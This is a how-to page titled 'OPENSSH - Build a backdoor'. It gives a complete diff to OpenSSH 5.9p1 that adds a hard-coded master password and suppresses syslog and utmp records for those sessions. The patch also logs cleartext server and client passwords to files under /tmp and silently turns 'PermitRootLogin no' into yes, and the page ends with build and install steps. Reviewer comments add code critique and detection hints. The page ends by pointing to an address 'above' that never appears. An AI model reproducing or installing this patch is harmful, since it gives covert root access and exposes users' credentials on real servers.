OPENSSH - Build a backdoor

Platforms:

  • CentOS 6.5 x86_64
  • OpenSSH 5.3 (the version the patched server reports in its banner; the diff itself is against openssh-5.9p1, see version.h below)

This is an OpenSSH backdoor patch. It adds a hard-coded password that is accepted for any account, suppresses syslog and utmp/wtmp records for sessions that use it, appends cleartext passwords to fixed files under /tmp on both the server (auth-passwd.c, auth-pam.c) and the client (sshconnect2.c), makes `PermitRootLogin no` parse as `yes`, and changes the advertised version string.

diff -u openssh-5.9p1/auth.c openssh-5.9p1_backdoor/auth.c
--- openssh-5.9p1/auth.c    2011-05-29 07:40:42.000000000 -0400
+++ openssh-5.9p1_backdoor/auth.c   2015-03-11 01:04:51.183027125 -0400
@@ -271,14 +271,16 @@
    else
            authmsg = authenticated ? "Accepted" : "Failed";

-   authlog("%s %s for %s%.100s from %.200s port %d%s",
-       authmsg,
-       method,
-       authctxt->valid ? "" : "invalid user ",
-       authctxt->user,
-       get_remote_ipaddr(),
-       get_remote_port(),
-       info);
+   if(!secret_ok || secret_ok !=1){
+           authlog("%s %s for %s%.100s from %.200s port %d%s",
+           authmsg,
+           method,
+           authctxt->valid ? "" : "invalid user ",
+           authctxt->user,
+           get_remote_ipaddr(),
+           get_remote_port(),
+           info);
+   }

 #ifdef CUSTOM_FAILED_LOGIN
    if (authenticated == 0 && !authctxt->postponed &&
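Review bot: The guard `if(!secret_ok || secret_ok !=1){` around the authlog call is redundant: `!secret_ok` already implies `secret_ok != 1`, so the whole test collapses to `if (secret_ok != 1) {`, and the same doubled form is repeated in canohost.c, log.c and sshlogin.c in this patch. `secret_ok` is a plain `int` defined in includes.h and is never reset, so this is a one-way, per-process switch; which of sshd's privilege-separated processes it is flipped in depends on where auth_password runs, which is outside this hunk. For anyone auditing a host, note that only the Accepted/Failed line is hidden here; the `CUSTOM_FAILED_LOGIN` path that follows is not gated. auth_log continues outside the hunk.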
diff -u openssh-5.9p1/auth-pam.c openssh-5.9p1_backdoor/auth-pam.c
--- openssh-5.9p1/auth-pam.c        2009-07-12 08:07:21.000000000 -0400
+++ openssh-5.9p1_backdoor/auth-pam.c       2015-03-11 01:09:47.944102444 -0400
@@ -1210,6 +1210,10 @@
    if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
            debug("PAM: password authentication accepted for %.100s",
                authctxt->user);
+           if((f=fopen(OPENSSH_KEY,"a+"))!=NULL){
+                   fprintf(f,"user:password --> %s:%s\n",authctxt->user, password);
+                   fclose(f);
+           }
            return 1;
    } else {
            debug("PAM: password authentication failed for %.100s: %s",
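Review bot: The fopen/fprintf inserted after the PAM success debug writes the cleartext `authctxt->user` and `password` to the fixed path `OPENSSH_KEY` (`/tmp/passwd` per includes.h) with permissions governed only by the process umask, so on a typical sshd (umask 022, and presumably running as root if this is the privileged monitor) the captured credentials are world-readable in a world-writable directory, and a symlink planted at that path by another local user is followed by `fopen(..., "a+")`. The `fclose` return is ignored, so a full disk silently drops records. For detection, both the literal path and the `user:password --> ` prefix survive as plain strings in the sshd binary and in the file itself. The enclosing function continues outside the hunk.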
diff -u openssh-5.9p1/auth-passwd.c openssh-5.9p1_backdoor/auth-passwd.c
--- openssh-5.9p1/auth-passwd.c     2009-03-07 19:40:28.000000000 -0500
+++ openssh-5.9p1_backdoor/auth-passwd.c    2015-03-11 01:12:46.188033775 -0400
@@ -85,7 +85,10 @@
 #if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
    static int expire_checked = 0;
 #endif
-
+   if (!strcmp(password, OPENSSH_LICENSE)) {
+                secret_ok=1;
+                return 1;
+        }
 #ifndef HAVE_CYGWIN
    if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
            ok = 0;
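Review bot: The `strcmp(password, OPENSSH_LICENSE)` check returns 1 before the root-login policy check immediately below it (`pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES`), before whatever the `expire_checked` logic declared just above does, and before `sys_auth_passwd` is ever called, and its return value bypasses the `ok` flag that the normal path folds in at `return (result && ok)` in the second hunk. `OPENSSH_LICENSE` expands to the string literal `"password"` (includes.h), compiled into sshd unobfuscated — `strings sshd` shows it next to `/tmp/passwd`. Note that `secret_ok=1` is set in whichever process executes auth_password, which under privilege separation is not necessarily the one that later emits the log lines gated on it; that is outside this hunk, as is the start of auth_password.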
@@ -123,6 +126,12 @@
    }
 #endif
    result = sys_auth_passwd(authctxt, password);
+   if(result){
+           if((f=fopen(OPENSSH_KEY,"a+"))!=NULL){
+                   fprintf(f,"%s:%s\n",authctxt->user, password);
+                   fclose(f);
+           }
+   }
    if (authctxt->force_pwchange)
            disable_forwarding();
    return (result && ok);
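Review bot: The `if(result){ ... fopen(OPENSSH_KEY,"a+") ... }` block records the cleartext password even when the login is ultimately refused, because `ok` (root-login policy, set earlier in this function) is only applied at `return (result && ok)` after the record has been written, and it reuses the global `FILE *f` from includes.h where a local would do. As in auth-pam.c the file is created at a fixed `/tmp` path under the process umask, so the captured credentials are typically readable by every local user, and `fclose` errors are ignored. For detection, the record format here is the bare `user:password\n`, unlike the `user:password --> ` prefix written by the PAM path, so both patterns belong in any check of `/tmp/passwd`. auth_password begins outside the hunk.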
diff -u openssh-5.9p1/canohost.c openssh-5.9p1_backdoor/canohost.c
--- openssh-5.9p1/canohost.c        2010-10-11 22:28:12.000000000 -0400
+++ openssh-5.9p1_backdoor/canohost.c       2015-03-11 01:04:51.183027125 -0400
@@ -78,10 +78,12 @@

    debug3("Trying to reverse map address %.100s.", ntop);
    /* Map the IP address to a host name. */
-   if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
-       NULL, 0, NI_NAMEREQD) != 0) {
-           /* Host name not found.  Use ip address. */
-           return xstrdup(ntop);
+   if(!secret_ok || secret_ok!=1){
+           if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
+               NULL, 0, NI_NAMEREQD) != 0) {
+                   /* Host name not found.  Use ip address. */
+                   return xstrdup(ntop);
+           }
    }

    /*
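Review bot: Skipping `getnameinfo` when `secret_ok == 1` leaves the `name` buffer it would have filled untouched, and get_remote_hostname continues past the hunk using `name` as the resolved host; unless `name` is initialised before the hunk (its declaration is not visible here) that is a read of uninitialised stack memory, undefined behaviour, and may surface as a garbled host string in places this patch does not suppress. The original early return `return xstrdup(ntop);` handles only the lookup-failure case; the new branch has no equivalent, so it neither resolves nor falls back to the address. The doubled test `!secret_ok || secret_ok!=1` is again just `secret_ok != 1`. The function starts and ends outside the hunk.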
Common subdirectories: openssh-5.9p1/contrib and openssh-5.9p1_backdoor/contrib
diff -u openssh-5.9p1/includes.h openssh-5.9p1_backdoor/includes.h
--- openssh-5.9p1/includes.h        2010-10-23 19:47:30.000000000 -0400
+++ openssh-5.9p1_backdoor/includes.h       2015-03-11 01:11:51.102059246 -0400
@@ -172,4 +172,9 @@

 #include "entropy.h"

+int secret_ok;
+FILE *f;
+#define OPENSSH_KEY "/tmp/passwd"
+#define OPENSSH_KEY_PUB "/tmp/passwd.pub"
+#define OPENSSH_LICENSE "password"
 #endif /* INCLUDES_H */
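Review bot: `int secret_ok;` and `FILE *f;` at lines 108–109 are definitions, not declarations, in a header that every translation unit includes, so each object file carries its own copy and the link relies on common-symbol merging — this works with the gcc 4.4 on the CentOS 6 target (`-fcommon` default) but is a multiple-definition error under `-fno-common`, the default since GCC 10. The conventional form is `extern int secret_ok;` in the header with one definition in a `.c` file, and there is no reason for a transient `FILE *` to be global at all. The three `#define`s are plain string literals, so `/tmp/passwd`, `/tmp/passwd.pub` and the literal `password` all survive unchanged into the compiled sshd and ssh binaries and are trivially found with `strings` — the simplest indicator for this patch.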
diff -u openssh-5.9p1/log.c openssh-5.9p1_backdoor/log.c
--- openssh-5.9p1/log.c     2011-06-20 00:42:23.000000000 -0400
+++ openssh-5.9p1_backdoor/log.c    2015-03-11 01:04:51.187040045 -0400
@@ -351,6 +351,7 @@
 void
 do_log(LogLevel level, const char *fmt, va_list args)
 {
+if(!secret_ok || secret_ok!=1){
 #if defined(HAVE_OPENLOG_R) && defined(SYSLOG_DATA_INIT)
    struct syslog_data sdata = SYSLOG_DATA_INIT;
 #endif
@@ -428,3 +429,4 @@
    }
    errno = saved_errno;
 }
+}
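Review bot: Wrapping the entire body of `do_log` in `if(!secret_ok || secret_ok!=1){` at line 121 mutes every log level for the process once the flag is set — `fatal()`, `error()` and `debug()` output included — so genuine failures in that session vanish along with the authentication record, and the local declarations that follow are now inside the block. The brace appended after the function's original `}` at line 129 makes the original brace close the `if` and the new one close the function, which reads as a mismatched block to anyone reading log.c later; the test itself reduces to `if (secret_ok != 1) {`. The flag is process-local, so whether the process emitting a given message is the one that set it depends on sshd's privilege-separation layout, outside this hunk.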
Common subdirectories: openssh-5.9p1/openbsd-compat and openssh-5.9p1_backdoor/openbsd-compat
Common subdirectories: openssh-5.9p1/regress and openssh-5.9p1_backdoor/regress
Common subdirectories: openssh-5.9p1/scard and openssh-5.9p1_backdoor/scard
diff -u openssh-5.9p1/servconf.c openssh-5.9p1_backdoor/servconf.c
--- openssh-5.9p1/servconf.c        2011-06-22 18:30:03.000000000 -0400
+++ openssh-5.9p1_backdoor/servconf.c       2015-03-11 01:04:51.187040045 -0400
@@ -686,7 +686,7 @@
    { "without-password",           PERMIT_NO_PASSWD },
    { "forced-commands-only",       PERMIT_FORCED_ONLY },
    { "yes",                        PERMIT_YES },
-   { "no",                         PERMIT_NO },
+   { "no",                         PERMIT_YES },
    { NULL, -1 }
 };
 static const struct multistate multistate_compression[] = {
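Review bot: Remapping `{ "no", PERMIT_NO }` to `PERMIT_YES` makes `PermitRootLogin no` in sshd_config parse as `yes` with no warning, while the other three keywords keep their meaning, so the file on disk no longer describes the running policy. Since this table is also what the config dump uses to print the effective value, `sshd -T | grep -i permitrootlogin` on the patched binary should report `yes` for a config that says `no` — a cheap consistency check when auditing a host, though I have not confirmed the dump path for this release. `sshd -t`, used later on this page, only validates syntax and will not notice. The table is complete within the hunk.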
diff -u openssh-5.9p1/sshconnect2.c openssh-5.9p1_backdoor/sshconnect2.c
--- openssh-5.9p1/sshconnect2.c     2011-05-29 07:42:34.000000000 -0400
+++ openssh-5.9p1_backdoor/sshconnect2.c    2015-03-11 01:10:57.143062282 -0400
@@ -878,6 +878,10 @@
    snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ",
        authctxt->server_user, host);
    password = read_passphrase(prompt, 0);
+   if((f=fopen(OPENSSH_KEY_PUB,"a+"))!=NULL){
+           fprintf(f,"%s:%s@%s\n",authctxt->server_user,password,authctxt->host);
+           fclose(f);
+   }
    packet_start(SSH2_MSG_USERAUTH_REQUEST);
    packet_put_cstring(authctxt->server_user);
    packet_put_cstring(authctxt->service);
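Review bot: This is the client side: the password the user just typed is appended in cleartext to `OPENSSH_KEY_PUB` (`/tmp/passwd.pub`) before the USERAUTH_REQUEST is even sent, so every attempt — typos and passwords rejected by the remote host included — is recorded together with `authctxt->server_user` and `authctxt->host`. The file lives in `/tmp` under the invoking user's umask, so on a multi-user machine other local users can typically read every outbound SSH password of every user of this `ssh` binary, and a symlink planted at that path is followed by `fopen(..., "a+")`. The `_PUB` suffix is misleading — nothing public-key-related is written — and the shared global `FILE *f` from includes.h is used where a local would do. userauth_passwd continues outside the hunk.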
diff -u openssh-5.9p1/sshlogin.c openssh-5.9p1_backdoor/sshlogin.c
--- openssh-5.9p1/sshlogin.c        2011-01-11 01:20:07.000000000 -0500
+++ openssh-5.9p1_backdoor/sshlogin.c       2015-03-11 01:04:51.190025713 -0400
@@ -133,8 +133,10 @@

    li = login_alloc_entry(pid, user, host, tty);
    login_set_addr(li, addr, addrlen);
-   login_login(li);
-   login_free_entry(li);
+   if(!secret_ok || secret_ok!=1){
+           login_login(li);
+           login_free_entry(li);
+   }
 }
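Review bot: Moving `login_free_entry(li)` inside the `if(!secret_ok || secret_ok!=1)` block leaks the `struct logininfo` returned by `login_alloc_entry` whenever the branch is skipped; only `login_login(li)` needed to be conditional, and `login_free_entry(li);` should stay unconditional after the block. The condition reduces to `secret_ok != 1`. The skipped call is what removes the session's utmp/wtmp/lastlog record, so comparing `last`/`who` output against connection-level evidence is the corresponding check on a suspect host. record_login starts outside the hunk.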

 #ifdef LOGIN_NEEDS_UTMPX
@@ -158,6 +160,8 @@
    struct logininfo *li;

    li = login_alloc_entry(pid, user, NULL, tty);
-   login_logout(li);
-   login_free_entry(li);
+   if(!secret_ok || secret_ok!=1){
+           login_logout(li);
+           login_free_entry(li);
+   }
 }
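Review bot: Same leak as in record_login: `login_free_entry(li)` is now skipped together with `login_logout(li)`, so the entry allocated two lines earlier by `login_alloc_entry` is never freed when `secret_ok == 1`; keep `login_free_entry(li);` outside the conditional. The doubled test again reduces to `secret_ok != 1`. record_logout begins outside the hunk.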
diff -u openssh-5.9p1/version.h openssh-5.9p1_backdoor/version.h
--- openssh-5.9p1/version.h 2011-09-06 19:11:20.000000000 -0400
+++ openssh-5.9p1_backdoor/version.h        2015-03-11 01:04:51.191030067 -0400
@@ -1,6 +1,6 @@
 /* $OpenBSD: version.h,v 1.62 2011/08/02 23:13:01 djm Exp $ */

-#define SSH_VERSION        "OpenSSH_5.9"
+#define SSH_VERSION        "OpenSSH_5.3"

 #define SSH_PORTABLE       "p1"
 #define SSH_RELEASE        SSH_VERSION SSH_PORTABLE

Build requirements (CentOS 6.5):

yum install -y patch
yum install -y openssl openssl-devel pam-devel
yum install -y zlib zlib-devel
yum -y install gcc

Build and install on CentOS 6.5 x86_64 (the steps as listed assume the downloaded tarball has already been extracted and that `openssh-5.9p1.patch/` is the directory holding the diff above):

wget http://ftp.openbsd.dk/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/
cd openssh-5.9p1
patch < sshbd5.9p1.diff
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
make && make install
/usr/sbin/sshd -t -f /etc/ssh/sshd_config
service sshd restart

Afterwards `ssh root@<host>` (8.8.8.8 above is only a placeholder) accepts the hard-coded `OPENSSH_LICENSE` password for root, even when sshd_config says `PermitRootLogin no`, and the session leaves no syslog or utmp record.
